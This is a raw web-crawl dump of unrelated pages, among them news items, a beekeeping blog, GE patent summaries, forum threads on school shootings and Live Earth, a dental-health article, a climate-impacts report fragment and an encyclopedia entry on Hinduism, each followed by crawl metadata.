other constituencies, leading to segregation. National University of Singapore sociologist Tan Ern Ser said the proposal could "reinforce consciousness of ethnic differences". A better approach would be to retain but reduce the size of GRCs to no more than three, until race matters less, he said. Mr Zaqy Mohamad, a PAP MP in Chua Chu Kang GRC, said that minority MPs still face challenges due to cultural sensitivities or language barriers. "There is still a gap, especially among the older generation. I have managed to bridge this over time, but it's still an investment," he said.
<urn:uuid:08d78cce-04c3-4507-8e85-63c321b63116>
CC-MAIN-2016-44
http://www.straitstimes.com/singapore/nsp-calls-for-grcs-to-be-scrapped
s3://commoncrawl/crawl-data/CC-MAIN-2016-44/segments/1476988718866.34/warc/CC-MAIN-20161020183838-00003-ip-10-171-6-4.ec2.internal.warc.gz
en
0.974495
591
1.53125
2
• Re-queening a beehive is the hardest, most tedious task in beekeeping. "It's the hardest, most aggrevatin'-ist thing you can do when you keep bees." My anonymous friend was talking about re-queening a hive. I second that emotion.<img src="http://lh4.ggpht.com/jgstovall/RlsFbRmDK9I/AAAAAAAAAsg/vfldXYHSyfU/s288/DSCN0089.jpg" align="right" hspace="5" /> I ordered new queens for all five hives this year, being told that good bee management says you should re-queen your hives at least once every two years. Some people re-queen every year, which is even better bee management. A hive with a young queen will produce more bees and is likely to stay healthier and ultimately produce more honey. The problem is getting the queen into the hive. Actually, the real problem is finding the old queen and killing her so the new queen will be accepted. A queen is somewhat longer than worker bees and thinner than a drone. She has pretty much the same markings as the worker bees, although her wing shape is a little different. Since there is only one queen per hive, you have to find this one slightly different critter among as many as 30,000 or 40,000 other critters. It's a real life needle-in-a-haystack problem. So, here's the score. My friend Jim Brown has been helping me, mainly because I'm not experienced enough to recognize a queen by my self. On our first go at it, we determined that two of the hives (Hives 4 and 5) had lost their queens -- which made it pretty easy to get the new queens in. Jim found the queen in a third hive (Hive 2). We could not find the queen in Hives 1 and 3. Jim has been back once to look, and I have been in the hives three times for a total of around five hours looking for the queens. So far, new queens 3 - old queens 2. I saw Coley O'Dell at the farmer's market this morning, and as usual, Coley had good advice. He described the method that he uses to find a queen that otherwise won't be found. I am going to give it a try this evening or something tomorrow. Stay tuned. I'll let you know how it turns out.Visit Honey Dot Comb, my beekeeper's journal.
<urn:uuid:197b37c6-4019-4296-8292-26098890f0f8>
CC-MAIN-2017-04
http://forum.beemaster.com/index.php?topic=17565.0
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280364.67/warc/CC-MAIN-20170116095120-00029-ip-10-171-10-70.ec2.internal.warc.gz
en
0.965221
540
2
2
Discussion Paper series, Forschungsinstitut zur Zukunft der Arbeit 6289 In this paper we analyze economic and spatial determinants of interregional migration in Kazakhstan using quarterly panel data on region to region migration in 2008-2010. In line with traditional economic theory we find that migration is determined by economic factors, first of all income: People are more likely to leave regions where incomes are low and more likely to move to regions with a higher income level. As predicted by gravity arguments, mobility is larger between more populated regions. Furthermore, distance has a strong negative impact on migration, indicating high migration related costs and risks. Assuming that high migration costs are caused by poor infrastructure, investments in public and social infrastructure should facilitate regional income convergence in Kazakhstan and improve living standards in depressed regions.
<urn:uuid:0207733f-fadb-4068-89da-a8c58cc60b4d>
CC-MAIN-2016-44
https://www.econstor.eu/handle/10419/58719
s3://commoncrawl/crawl-data/CC-MAIN-2016-44/segments/1476988722459.85/warc/CC-MAIN-20161020183842-00343-ip-10-171-6-4.ec2.internal.warc.gz
en
0.907377
164
2.0625
2
The General Electric Company of Schenectady, NY, is a major American innovator, involved with the development of technology infrastructure, energy systems and many consumer technologies. The wide scope of this business’s activities makes them a regular feature in IPWatchdog’s Companies We Follow series. See General Electric articles for our features on GE. Recent reports from multiple news outlets announced that General Electric was moving on from plans to develop solar energy power plants by selling it’s solar technology to First Solar Inc., an American developer of solar panels. At the same time, GE is looking to increase its presence in the aviation industry. The early August acquisition of Avio Aero, an Italian developer of military and civil aircraft systems, is a step in this direction for the corporation. Today, we check in with General Electric to see what technological systems it’s trying to protect through the U.S. Patent & Trademark Office. Many of the published USPTO documents we feature here discuss improvements to energy systems. These include two patent applications, one that would protect smart energy storage for in-home water heaters and another that would protect a system of monitoring damage to power cables. An issued patent discusses GE’s development of a self-healing electrical power grid. We also take a look at two other patent applications that showcase General Electric’s activities in other areas of consumer and industrial innovation. One application is filed to protect a detachable dishwasher door that makes it easier for technicians to provide maintenance. One final application we include discusses a system of trapping gaseous carbon dioxide exhaust from power plants in a solid state. Self-Healing Power Grid and Method Thereof U.S. Patent No. 8504214 An electrical power grid is a very complex system made up of many electrical networks and connections. A grid is responsible for controlling the access to electrical power for utility subscribers with connections to the grid. Because of the system’s complexity, small issues often build up and can cause some components to operate at a lower capacity or to stop operating altogether because of malfunction. The stress that this creates for neighboring elements on the grid, which must work harder to compensate for damaged components, can lead to grid damage or power outages. Recently, the USPTO awarded General Electric the right to protect a system of damage monitoring for power grids. The monitoring system determines the “current infectiousness rate”, or the current operational state, of grid components. This monitoring system can adjust the operating capacity of grid components if it determines a change in any component’s infectiousness rate. In this way, the grid can prevent against excessive load strain because of damaged components. As Claim 1 states, General Electric has been issued a patent that protects: “A method for determining a self-healing power grid status, comprising: receiving respective real-time monitoring data corresponding to one or more power grid components, wherein one or more agents are coupled to said power grid components; determining a respective current infectiousness state based upon the received respective real-time monitoring data; determining respective output data based upon the respective current infectiousness state; exchanging the respective output data with one or more neighboring agents; generating one or more state transition probabilities based upon one or more parameters and a state transition diagram; and generating a respective new infectiousness state based upon the one or more state transition probabilities.” U.S. Patent App. No. 20130193819 Contemporary dishwashers typically use a hinged door to allow access to the inner cabinet, where dishes can be stacked for washing. However, the door is often removed when performing maintenance on a dishwasher, which is difficult to do without removing the dishwasher from its enclosure. This is cumbersome because of the need to disconnect plumbing and electrical lines, and can also damage a kitchen floor. This patent application describes a new design for a detachable dishwasher door developed by General Electric. The system allows for a dishwasher door to be detached from the rest of the appliance by sliding the hinge free from a bracket on the door. When the hinge is removed, it frees the fastener connections securing the door’s bracket flanges to the dishwasher. Claim 1 of this patent application seeks protection for: “An appliance comprising: a cabinet defining a chamber; a door removably mounted to said cabinet, said door providing selective access to the chamber of said cabinet, said door defining a pocket at a corner of said door, said door also defining a flange located adjacent the pocket; a bracket configured for receipt into the pocket of said door, said bracket having a first end defining a channel with a c-shaped profile, the first end of said bracket also defining a projection for mating receipt of the flange of said door, said bracket also having a second end spaced apart longitudinally from the first end of said bracket, the second end of said bracket defining a tab, the tab being disposed orthogonal to the flange of said door; a hinge positioned at the pocket of said door, said hinge having a first end positioned inside the channel of said bracket, said hinge also having a second end spaced apart longitudinally from the first end of said hinge, the second end of said hinge defining an extension, the extension being disposed orthogonal to the flange of said door, the extension also being positioned adjacent the tab of said bracket; and a fastener positioned adjacent the tab of said bracket and the extension of said hinge, the fastener selectively coupling the tab and the extension together.” Systems and Method for Capturing Carbon Dioxide U.S. Patent Application No. 20130202517 Carbon dioxide gas emissions are a major contributor to the “greenhouse” effect that has caused temperatures to rise across the world over the past century or so. Power plants are considered to be a major producer of carbon dioxide emissions, and many methods have been developed to capture CO2 trapped in exhaust gas from power plants. Liquid solvents can be used to trap CO2 gas in an aqueous solution. However, the large amount of liquid solvent needed to trap the gas makes it economically unviable for many. This patent application, filed by General Electric, was filed to protect a new system of trapping carbon dioxide in a solid state after trapping it as a gas. CO2 exhaust gas from power plants would be diverted into a chamber where it would contact a liquid phase-changing sorbent. This liquid substance would be chemically reactive with CO2 so that it converts carbon dioxide into its solid state. This prevents the gas from being dispersed into the atmosphere and saves it as a solid for later disposal. Claim 1 of this General Electric patent application would protect: “A method for forming carbon dioxide from a gas stream, comprising: chemically reacting carbon dioxide in a gas stream with a liquid phase-changing sorbent to form a solid reaction product, wherein the solid reaction product is in the form of a dry solid, a wet solid, a slurry, or a fine suspension; storing the solid reaction product; and heating the solid reaction product to form carbon dioxide gas and the liquid phase-changing sorbent.” Heated Water Energy Storage System U.S. Patent App. No. 20130202277 The energy used to heat water in a residence can be anywhere from 10 percent to 15 percent of that home’s total energy use. Many areas of the country where electricity is scarcer and grid demands are high, the cost of a kilowatt-hour (kWh) may vary throughout the day in response to peak demand times. Off-peak hours may cost 6 cents per kWh, while high demand can send prices soaring to $1.20 per kWh in certain areas. However, it’s difficult to change behaviors regarding water heating, as showers, washing machines and dishwashers are often operated during peak demand hours. General Electric has recently filed this patent application with the USPTO, which describes a system of storing energy for later use in water heating. A thermostat in the hot water storage detects the temperature of stored water and sends a control message to an electricity provider if more energy is required. This system would keep hot water temperature within an optimal range while drawing electricity during non-peak hours for later use. As Claim 1 explains, this patent application seeks the right to protect: “A water heater energy storage system, comprising: a storage tank that stores water; at least one heating element disposed with the storage tank; a thermostatic controller that senses and regulates tank water temperature; a signal communication device in communication with a utility that sends and receives system information; and a controller configured to regulate the system based on communications between the signal communication device and the utility.” System and Method for Health Monitoring of Power Cables U.S. Patent Application No. 20130194101 Electrical current leakage from power cables can create a dangerous atmosphere for those nearby. Beyond the fact that direct contact with electricity can be fatal, leakage can contribute to damage to electrical systems, which can result in system failure or increased electrical fire risks. In some electrical cables, shields are installed that divert current leakage to a grounded line and away from others. The system General Electric describes in this patent application would be able to detect the level of current leakage drawn by the cable shields. A transducer included on the cable’s health monitoring system would measure this leakage and send a current signal to the utility provider that indicates the health of the power line. If the leakage exceeds a certain level, an alarm signal is generated that can shut off the power and prevent damage. Claim 1 of this patent application would give General Electric the right to protect: “A power cable health monitoring system, comprising: a shield surrounding a power cable and configured to divert leakage current from the power cable to ground; a current transducer configured to measure the leakage current and output a current signal corresponding to the leakage current; and a processor configured to receive the current signal and output an indication of the power cable health based on the current signal.”
<urn:uuid:8ce4ac2a-1497-4c6d-a167-8d018a939820>
CC-MAIN-2017-04
http://www.ipwatchdog.com/2013/08/12/general-electric-patents-self-healing-power-grid/id=44557/
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280364.67/warc/CC-MAIN-20170116095120-00032-ip-10-171-10-70.ec2.internal.warc.gz
en
0.928276
2,086
1.992188
2
What can be done to make schools safer from deranged shooters? Today another tragedy where one deranged shooter killed 26 innocent people in Connecticut. Some will call for bans of firearms and restrictions of civil rights to make people feel safer. I don't want people to "feel safer" I want to do something that actually makes people safer. I submit that banning some firearms and restricting magazine capacities would not have prevented today's shooting or reduced the number of innocent deaths. If the goal is to make schools safer for the students, then: 1) Would a law requiring that a certain percentage (perhaps 50% or 100%) of teachers be trained (to local law enforcement level training) and armed while they are teaching to protect the children and themselves? Now schools are "predator feeding zones" as they are designated "gun free zones". I am not concerned with liberal opposition to my politically incorrect path; or union opposition to changing the job description of a teacher. If the problem is to be addressed then we have to look at solutions to reach the goal. 2) How about designing school so that someone who seeks to gain access to the school while armed is detected and prevented from gaining access? Limited access should be easy to design and all the technology exists. Cameras, metal detectors, remote control doors, intercoms . . . . Harden the classrooms with security doors which can withstand rifle fire and resist being opened with tools. Make the windows high enough to prevent outside viewing, and other things which I have not thought about; to make it more difficult for a predator to get access to the people in schools. Am I thinking about impossible responsibilities here? NRA Life Member - Orange Gunsite Member - NRA Certified Pistol Instructor "When plunder becomes a way of life for a group of men living together in society, they create for themselves in the course of time a legal system that authorizes it and a moral code that justifies it." Frederic Bastiat
<urn:uuid:97412a56-ed4e-4976-91ba-61ff37915877>
CC-MAIN-2017-04
http://thefiringline.com/forums/showpost.php?p=5322722&postcount=1
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560281424.85/warc/CC-MAIN-20170116095121-00329-ip-10-171-10-70.ec2.internal.warc.gz
en
0.946414
404
1.632813
2
Healthy Teeth are Important for Our Health Healthy teeth are determined by lifestyle, dietary habits and how an individual take care of his teeth. Procrastinating in doing periodic inspection and only visit the dentist when the teeth are in trouble will affect one’s overall health. Why Healthy Teeth Are important? Well, do not expect frequent brushing in the correct manner is all we need for healthy teeth. Many people would think that dental problems are minor issues as it will not result in a variety of any other chronic diseases. Thus, most of us will take the easy way and neglect the actual care for oral hygiene. In actual fact, good oral health is of utmost importance as our mouths are where the food enters our body and where the speeches originate. If oral hygiene is not given careful attention, thousands of live bacteria in the mouth can cause tooth decay, periodontal diseases or gum diseases. Researchers have found that periodontitis (gum inflammation) is associated with systemic diseases such as cardiovascular disease, stroke, diabetes and pneumonia. It is a fact that most chronic diseases can be caused by the problems of harmful germs that grow in the mouth. Many of us are not aware of this due to the lack of exposure to the importance of having healthy teeth. By looking at the relationship between periodontitis and systemic diseases, prevention can be an important step in efforts to maintain oral health for overall health. This sounds trivial but those who do not take care of their teeth and mouth might have to undergo surgery as a result of the infection in the lungs, spleen and etceteras. Therefore, oral health problems should never be underestimated. How to maintain Oral Health? According to the experts, healthy gum should have the following characteristics: pale, firm texture and should be in a position close to the teeth. If our gums do not show such features, it may be indicative of inflammation of the gums; however, do not worry because this condition can be overcome by taking good dental care. We need to brush our teeth twice a day and follow by the use of an effective antiseptic mouthwash to penetrate the plaque bacteria. Nevertheless, this will only help to clean up to 50 percent of the mouth. If there is dirt remains, such as tar and tartar, it cannot be cleansed easily by simply brushing our teeth. Permanent stains can only be removed by our dentist. Thus, regular visits to the dentist are compulsory for good oral health. Many of us do not know that the human mouth or tongue also contain many hidden germs. That is why most of us only brush our teeth everyday without cleaning the tongue. In order to get a healthy mouth, we should use tongue cleaner to clean up the tongue regularly after every brush in addition to using a mouth wash to clean the whole mouth. Most studies have found that the bacteria in the mouth can enter the body easily and cause a person to be susceptible to disease. So, let us start giving more attention to oral health as it will directly impact our overall health. In a nutshell, there are six things that need to be addressed for overall oral health: 1) Ensure the teeth are cleansed of plaque and food debris. 2) Ensure the teeth are free from the effects of dental tartar (which is usually caused by nicotine in cigarette smoke). 3) Maintain healthy and soft gums. 4) Ensure the teeth are free from cavities (holes). 5) There is fresh breath from the mouth. 6) The teeth are naturally healthy. These six things can be achieved easily through the following four steps: 1) Brush our teeth twice a day. 2) Clean up food debris in between teeth with dental floss. 3) Gargle using antiseptics mouth wash. 4) Undergo periodic dental examinations at least twice a year. The use of antiseptic mouth wash can help: 1) Elimination of germs that cause mouth problems. 2) Strengthens tooth enamel. 3) Maintain healthy gums. 4) Reduce dental plaque. 5) Freshen breath. 6) Makes our teeth look clean and white. With clean and healthy teeth, we will have healthy body couple with nice smiles!
<urn:uuid:5757cafd-c9c7-4616-9813-f8b039fdbb0f>
CC-MAIN-2017-04
http://hubpages.com/health/Healthy-Teeth-is-Important-for-Our-Health
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560285001.96/warc/CC-MAIN-20170116095125-00307-ip-10-171-10-70.ec2.internal.warc.gz
en
0.931871
878
3.40625
3
Earn 20 Together Rewards points on this item Details:<br /> This fascinating selection of photographs illustrates the extraordinary transformation that has taken place in Chester during the twentieth century. The book offers an insight into the daily lives and living conditions of local people and gives the reader glimpses and details of familiar places during a century of unprecedented change. <br /> <br /> Many aspects of Chester’s recent 5 points for every pound you spend Rewards Points PLUS Great Prices - YES! We're proud to give even more back to you and reward all Together Rewards Card members with 5 points for every £1 spent, along with exclusive offers, bonus points promotions, member exclusive gifts and more! Interested? Order a card with your purchase and once you've registered and linked your Card, you'll receive 50 FREE points (worth 50p) and you'll receive Reward Vouchers every 3 months to spend on anything you like in-store and online! Click here to find out how to get your Together Card.
<urn:uuid:7f8d22a3-1bc0-4c91-a038-e866ea3bf05b>
CC-MAIN-2017-04
http://www.theworks.co.uk/p/british-history-books/a-century-of-chester/9780752474731/
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560279368.44/warc/CC-MAIN-20170116095119-00320-ip-10-171-10-70.ec2.internal.warc.gz
en
0.925316
205
1.664063
2
Functional Constraints on the Evolution of Eye Morphology – A Deep Look Into the Eyes of Dinosaurs and Teleost Reef Fishes A Department of Ecology and Evolutionary Biology Seminar Series featuring Lars Schmitz, W.M. Keck Science Dept, Claremont McKenna College Wednesday, January 29, 2014 12:00 PM - 1:00 PM 2320 Life Sciences Building I will describe recent efforts investigating the role of functional constraints on the evolution and diversification of visual morphology. The visual system is an ideal case for testing hypotheses about the origins of diversity, because the eye is a complex structure with multiple components, each with specific functional implications. As the physical requirements of vision are clearly defined, one can study morphological and functional adaptations to environments and behaviors that impose divergent physical challenges. In four case studies I will describe how ecology may drive the evolution of eye size, eye shape, and retina structure in such disparate groups as dinosaurs, teleost reef fish, mammals, and squid. A central part of my talk will deal with the possibility of using the linkage between form and function of the eye to make inferences about the diel activity patterns of fossil vertebrates. The results underline that the vertebrate eye offers a rich system for tests of hypotheses about the causes of diversity and is a key to a better understanding of the dynamics between physics and evolution, even though many questions need further investigation. Host: David Jacobs Refreshments will be served at 11:40 a.m.
<urn:uuid:0712ff17-751c-4267-8be8-2cc3ed57d25a>
CC-MAIN-2016-44
http://www.environment.ucla.edu/events/archive/event1240.html
s3://commoncrawl/crawl-data/CC-MAIN-2016-44/segments/1476988721278.88/warc/CC-MAIN-20161020183841-00147-ip-10-171-6-4.ec2.internal.warc.gz
en
0.885461
309
1.859375
2
It is commonly accepted that the majority of engineering failures happen due to fatigue or fracture phenomena. Adhesive bonding is a prevailing joining technique, widely used for critical connections in composite structures. However, the lack of knowledge regarding fatigue and fracture behaviour, and the shortage of tools for credible fatigue design, hinders the potential benefits of adhesively bonded joints. The demand for reliable and safe structures necessitates deep knowledge in this area in order to avoid catastrophic structural failures. This book reviews recent research in the field of fatigue and fracture of adhesively-bonded composite joints. The first part of the book discusses the experimental investigation of the reliability of adhesively-bonded composite joints, current research on understanding damage mechanisms, fatigue and fracture, durability and ageing as well as implications for design. The second part of the book covers the modelling of bond performance and failure mechanisms in different loading conditions. - A detailed reference work for researchers in aerospace and engineering - Expert coverage of different adhesively bonded composite joint structures - An overview of joint failure To view this DRM protected ebook on your desktop or laptop you will need to have Adobe Digital Editions installed. It is a free software. We also strongly recommend that you sign up for an AdobeID at the Adobe website. For more details please see FAQ 1&2. To view this ebook on an iPhone, iPad or Android mobile device you will need the Adobe Digital Editions app, or BlueFire Reader or Txtr app. These are free, too. For more details see this article. |Size: ||37.3 MB| |Publisher: ||Woodhead Publishing| |Date published: || 2014| |ISBN: ||9780857098122 (DRM-EPUB)| |Read Aloud: ||not allowed|
<urn:uuid:57939c1c-64e0-4a69-8543-38a59d5e9f50>
CC-MAIN-2017-04
http://www.lybrary.com/fatigue-and-fracture-of-adhesivelybonded-composite-joints-p-647165.html
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280483.83/warc/CC-MAIN-20170116095120-00296-ip-10-171-10-70.ec2.internal.warc.gz
en
0.85991
372
2.34375
2
Discussion in 'Off-Topic Chat' started by dyl, Jul 7, 2007. Madonna: "If you wanna save the Earth, let me see you jump up" Yup, that'll work! Find more discussions like this one Providing they have energy saving lightbulbs in their hands and pull out those nasty 100w bad boys then yes. How did all these stars get to this gig then? The hybrid power limo company must have been flat out. They all walked and swam there, of course. And as an aside, how many will see an increase in CD sales over the next couple of weeks? Dyl. I am shocked. You of all people being cynical? These publicity obsessed stars are doing this for the environment. I believe they were all shipped to Wembley in Toyota Pruis "zero-emissions" cars. But maybe someone should have mentioned that the electricity to power one of those oversized, energy-inefficiant milkfloats was probably generated in a nasty coal burning power station... I was dropping in and out of the concert coverage all day, and I have to say I've enjoyed the coverage and the sheer randomness of some of the acts. But I also have to smile at the irony of putting on a concert with a huge PA system, enough lights to light a small city, and flying rock stars around the World to play at it, all in the name of energy conservation. :-? Have missed Live Earth, but just back from an excellent concert at Sudeley Castle in Gloucestershire. Polysteel were fantastic, followed by Frank Renton and the British Concert Orchestra and a Spitfire, Lancaster & Hurricane fly past - What a brilliant night. Well done to all at Polysteel for such an entertaining and well played set :clap: Have now got Live Earth on Interactive and a superb end to a great night - Metallica, Enter Sandman and Spinal Tap, Big Bottoms!! - Top Heard somewhere that the Red Hot Chilli Peppers arrived at their gig on their own private jet How hypocritical can you get? Whatever next - Bono lecturing us on global poverty? Charles Kennedy promoting the importance of a smoking ban? All these stars have done is make the problem worse. If they haven't have had a concert then they wouldn't have burnt all them watts of electricity and flown all them miles on airplane etc. They just did it for themselves not the enviroment! They should have had a brass band concert instead as we are more energy efficient. We don't use PA systems and we can march to concerts! lol During the coverage, they cut to the Sydney concert which was just finishing, and ironically, the lights had failed a few hours before the end of the concert! Now that should conserve some energy!! :clap: Has to be one of the biggest wastes of time I've ever seen! No more than a big luvvie- in for pop stars and pals. Shame on the BBC for presenting such a one sided case for Global Warming! Poor David Baddiel got short shrift when he tried to show the hypocracy of the event. Nice cheap way for the Beeb to take up 10 hours of TV time without any planning anyway. Is it just me or were Spinal Tap better than Metallica? And I really like Metallica!! Jonathan Ross asked Chris Rock and Ricky Gervaise whether Live earth would make any difference to global warming, Chris Rock told it how it is and said... "Live Earth will cure global warming in the same way that Live Aid cured world famine." He then said something that would have got him kicked out of the big brother house and they quickly cut to another overpaid rock 'star'. I wonder how many of the acts actually did it for free? I'm sure they wouls have got some sort of money from record companies, sponsors, all the sort of companies that are contributing the most to the effects of global warming. Very hypocritical!!! I missed the Live Earth concert - what did he say...? Cant mind what they said exactly but thot they were hilarious! Didnt think what he said was that bad, but then again Im not that PC anyway. Didnt see an awful lot of the show as I was working, but was raging when they cut from Metallica to Crowed House, who somewhere else in the world when Mettalica were just about to play Enter Sandman, I mean come on! After listening to those so-called stars preaching about something they obviously new nothing about, i turned on every electrical item i have and went outside and burnt a dozen tyre's. I am not too fussed on what he said either, but the the PC brigade are...... Chris Rock said some thing like.. 'Global warming is getting so bad that you white folk are starting to go around calling each other *iggers'! Knowing what kind of comedian he is and some of the things he could have said, that was quite tame, but Jonathan Ross seemed quite shocked!!! Separate names with a comma.
<urn:uuid:96a00455-63de-4c6b-8faa-31f40947bce9>
CC-MAIN-2017-04
http://www.themouthpiece.com/forum/threads/live-earth.29033/
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280835.60/warc/CC-MAIN-20170116095120-00465-ip-10-171-10-70.ec2.internal.warc.gz
en
0.969613
1,062
1.546875
2
Xi Jinping, China’s next president to be, is in D.C. today meeting with President Obama. He needs to get a simple message: America is going to play by China’s rules. Among other things, this means government subsidies for American exporters who make their products here; special protections for what we consider “strategic industries” and technology that we will seed and grow only in the United States; investment incentives for companies that bring jobs back to the United States from other countries, and requirements that foreign companies that want to sell in what is still the world’s most lucrative market must make those products in America. U.S. companies that offshore jobs, production and technology will pay higher taxes, as well as tariffs on their goods entering the country. China can manipulate its currency all it wishes; we will add tariffs on Chinese goods to offset the difference. Don’t protect intellectual property; you’ll get less of it, and what you do get/steal will be subject to yet more tariffs. But isn’t this protectionism? Call it what you wish. Tariffs and other measures to protect American industries and jobs are as old as Alexander Hamilton. They are now China’s rules for doing business, and by doing nothing about it aside from the desultory World Trade Organization case, we are doing great damage to ourselves. The trading world that America made after World War II had a good run, creating prosperity and keeping the peace among trading nations. But it’s over, notwithstanding any symbolic, one-off trade deals announced during this visit. The rise of China and its state capitalism make it null and void because this order was dependent on everyone playing by the same liberalized trade rules. What do we have to lose? China buys little from America and its debt holdings are more dangerous to Beijing than to Washington. And don’t tell me about Smoot-Hawley and the Depression: Tariffs were already high when Smoot was passed, and the world didn’t have today’s globalization issues. No question the corporate and political elites want to continue the status quo. In a larger context, however, it is a recipe for national decline, if not national suicide. In the long run, this will be good for China, too. The vast imbalances of trade, investment and debt can’t be cured without a fast-growing American economy and an American middle-class that is rising again. When the communist party finally collapses or reforms itself, maybe China’s new leaders will be interested in playing by old the American rules. In the meantime, America first. And Don’t Miss: Why manufacturing matters, redux || Foreign Policy Today’s Econ Haiku: Tolerance pays off It’s true of economics And other rainbows
<urn:uuid:20684edd-5c16-4392-93cf-01b91ce96c2a>
CC-MAIN-2017-04
http://blogs.seattletimes.com/jontalton/2012/02/14/play_by_chinas_rules/
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560279224.13/warc/CC-MAIN-20170116095119-00479-ip-10-171-10-70.ec2.internal.warc.gz
en
0.946672
595
1.820313
2
The Impacts and Costs of Climate Change variable rainfall increase the risk of drought. The implications for water supply are an increase in potential regions of water stress and water poverty. Above 2 to 2.50C global average temperature increase it is projected that an additional 2.4 to 3.1 billion people will be at risk of water stress20. The regional area subject to water stress under some scenarios is 10% of the Earth's land surface.21 Water quality is also sensitive to higher temperatures, lower river flows, saline intrusion with sea level rise and increased storminess. Low flows and higher temperatures are likely to decrease the dissolved oxygen in lakes and slow moving rivers, increasing stresses on fish. Low flows are already a problem in southern Europe, and this could be exacerbated by climate change. The many local controls on water quality have hindered a global assessment of potential climate change damages. The impacts of projected climate change on water resources appear to be significant. The IPCC's Third Assessment Report highlights that existing water stressed regions are likely to be more stressed in the future as a consequence of climate change. Water stress is a key impact projected to affect large numbers of people. The effects will be exacerbated by threshold behaviour caused by the interplay between climate change effects, socio-economic trends and limits to adaptation capacity (Arnell 2000; Jones 2000). For many regions under water stress, a global mean temperature increase above around 1.5C would lead to a decrease in water supply. The table below from Arnell et al. (2002), summarizes the risks of water shortage with the associated increase in global mean temperature above 1861-1990 for three emission scenarios. The increase in water stress is presented for unmitigated emissions, and stabilization at 550 and 750 ppm CO2 for the 2020s, 2050s and 2080s. Table 7. Population with potential increase in water stress for three emission scenarios. Year or aNo climate Unmitigated S750 S550 (Additional period change (Millions) Emissions (Additional (Additional Millions 2020s 5022 338-623 242 175 2050s 5914 2209-3195 2108 1705 2080s 6405 2831-3436 2925 762 Sources: Arnell et al. (2002) aNumber of people in countries using more than 20% of their water resources. Increase in stress means a reduction in resource availability by more than 10%. One of the main messages from this is that after the 2020s the number at risk rises rapidly with temperature and that reduction of the increase in temperature, at lower stabilization levels reduces the risk substantially (Hare 200322). There is a major increase in risk of water stress in the 2080s. The shape of the temperature response curves in the 2050s is quite different from that in the 2080s. Risk rises rapidly with any temperature increase in the 2050s, whilst in the 2080s, risk initially rises quite slowly. A loC increase in the 2050s is associated with an impact almost ten times larger than in the 2080s, whereas the level of risk is comparable in both periods for a 20C or higher warming. As temperature increases in the 2080s period from around 1.00C above 1861-1990 to around 20C, the number at risk increases about five fold. One of the major reasons for this is the increased water scarcity problem for major mega-cities in Asia estimated for this time period (Hare 2003). One of the major future risks identified in the Parry et al. (2001) and Arnell et al. (2002) work is that of increased water demand from megacities in India and China in the 2080s. It is not clear whether or 20 Source: Parry et al, 2001 21 Alcamo, J. and Henrichs, T. (2002) Critical regions: A model-based estimate of world water regions sensitive to global changes. Aquatic Science 64: 352-362. 2 Source: Hare, W. (2003) Assessment of knowledge on impacts of climate change contribution to the specification of art. 2 of the UNFCCC: Impacts on ecosystems, food production, water and socio-economic systems (see AEA Technology Environment, August 2005 Watkiss, Paul; Downing, Tom; Handley, Claire & Butterfield, Ruth. The Impacts and Costs of Climate Change. Oxford, England. UNT Digital Library. http://digital.library.unt.edu/ark:/67531/metadc29337/. Accessed January 20, 2017.
<urn:uuid:d210e2b9-d0bb-49af-a6b3-048a1b9477f0>
CC-MAIN-2017-04
http://digital.library.unt.edu/ark:/67531/metadc29337/m1/24/ocr/
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280899.42/warc/CC-MAIN-20170116095120-00574-ip-10-171-10-70.ec2.internal.warc.gz
en
0.905865
981
3.484375
3
It's been nearly a hundred years since Atlantic salmon swam the Seine upriver to Paris. Now they've done it on their own, without any efforts to reintroduce them. AFP reports that hundreds, maybe a thousand, swam past the Eiffel Tower and Notre Dame cathedral this year. And they aren't all. Only four species swam through Paris in 1995 when up to 500 tons of fish died upriver every year in foul pollution. Today at least 32 species inhabit the Seine, including lamprey eel, sea trout, and shad. Why? Because there have been massive clean-up efforts in the last 15 years, including construction of a new water purification plant. Reduce. Reuse. Recycle. Restore.
<urn:uuid:3e9fd354-021b-4baf-a1d8-4ba5d1057705>
CC-MAIN-2017-04
http://www.motherjones.com/blue-marble/2009/08/salmon-return-paris
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560284352.26/warc/CC-MAIN-20170116095124-00193-ip-10-171-10-70.ec2.internal.warc.gz
en
0.954954
155
2.96875
3
|The dominant religious expression of the Indian subcontinent. Its salient characteristics include a hoary mythology, an absence of recorded history (or "founder"), a cyclical notion of time, a pantheism that infuses divinity into the world around, an immanentist relationship between people and divinity, a priestly class, and a tolerance of diverse paths to the ultimate ("god"). Its sacral language is Sanskrit, which came to India about 5,000 years ago along with the Aryans, who came from Central Asia. The following are the Hindu sacred texts: (1) Vedas, which are four in number (Rig, Yajur, Sama, and Atharva; 1500 to 1200 B.C.E.); (2) Upanishads (some traced back to the sixth century B.C.E.); (3) Dharma Shastras (sixth and third centuries B.C.E.); (4) Ramayana and Mahabharata (third century B.C.E. and first century C.E.); (5) Puranas (first and tenth centuries C.E.); and (6) Tantras (sixth-seventh centuries C.E.). The Vedas are mythopoeic compositions that celebrate the divine guardians of earth (Aditi), sky (Varuna, Indra, and Surya), and fire (Agni). The fire sacrifices were conducted by kings and their priests to acquire prosperity in work, success in warfare, and felicity in domestic life. The Upanishads were collectively called Vedanta. These texts often contain mystical discourses between a virtuoso and his disciples. They are less ritualistic and more introspective in orientation. Many of them impart esoteric knowledge to the aspirant who seeks illumination. The Dharma Shastras are canonical treatises that enjoin upon Hindus observance of ritual and normative regulations. They uphold a hierarchic social order in which the higher and lower castes are ranked according to the level of their ritual purity. For centuries they have been accepted as the compendia of norms for the social behavior of the Hindu. The Ramayana and Mahabharata are records of ancient dynastic struggles. They delineate the heroic deeds of men and women who were pitted against court intrigue, warfare, and turbulence. The themes drawn from them are put into plays, songs, and ballads; up to the present, they have inspired creativity in literary and other cultural outputs. The Puranas are records of theophany that aim at the destruction of evil (symbolized by demons) and the recovery of good (symbolized by suffering people). The Puranas center on the principal deities of the post-Vedic era: Shiva, Shakti, and Vishnu. Tantras are a body of formulae and techniques that eliminate the mechanical 